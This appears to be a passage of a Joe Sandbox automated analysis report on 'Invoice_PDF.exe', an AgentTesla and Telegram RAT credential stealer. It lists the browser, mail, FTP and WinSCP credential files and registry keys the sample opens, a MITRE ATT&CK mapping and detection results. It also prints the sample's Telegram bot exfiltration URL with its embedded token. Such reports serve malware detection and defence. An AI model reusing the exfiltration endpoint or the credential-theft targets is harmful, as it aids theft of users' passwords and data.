                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Invoice_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.Invoice_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4130420.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Invoice_PDF.exe.4219800.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Invoice_PDF.exe PID: 5944, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Invoice_PDF.exe45%VirustotalBrowse
                      Invoice_PDF.exe49%MetadefenderBrowse
                      Invoice_PDF.exe62%ReversingLabsByteCode-MSIL.Backdoor.Androm
                      Invoice_PDF.exe100%AviraHEUR/AGEN.1141888

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.0.Invoice_PDF.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.Invoice_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.Invoice_PDF.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://PHCGWf.com0%Avira URL Cloudsafe
                      http://www.fontbureau.comE80%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      http://www.fontbureau.comoitu0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      https://87HMfkdDwCo1wEm.org0%Avira URL Cloudsafe
                      http://www.fontbureau.como0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.fontbureau.comgrito0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.chinhdo.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://87HMfkdDwCo1wEm.orgx0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.apache.org/licenses/LICENSE-2.0Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                		high
                                http://DynDns.comDynDNSInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.orgInvoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        		high
                                        http://PHCGWf.comInvoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comE8Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.goodfont.co.krInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.carterandcone.comlInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org4Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comoituInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://87HMfkdDwCo1wEm.orgInvoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comoInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comgritoInvoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fonts.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://api.telegram.orgInvoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.chinhdo.comInvoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInvoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.sakkal.comInvoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://87HMfkdDwCo1wEm.orgxInvoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipInvoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmpfalse
                                                        		high

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUfalse

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:532735
                                                        Start date:02.12.2021
                                                        Start time:16:53:42
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 42s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:Invoice_PDF.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:23
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 0.3% (good quality ratio 0.1%)
                                                        • Quality average: 24.8%
                                                        • Quality standard deviation: 36.9%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 78
                                                        • Number of non-executed functions: 7
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
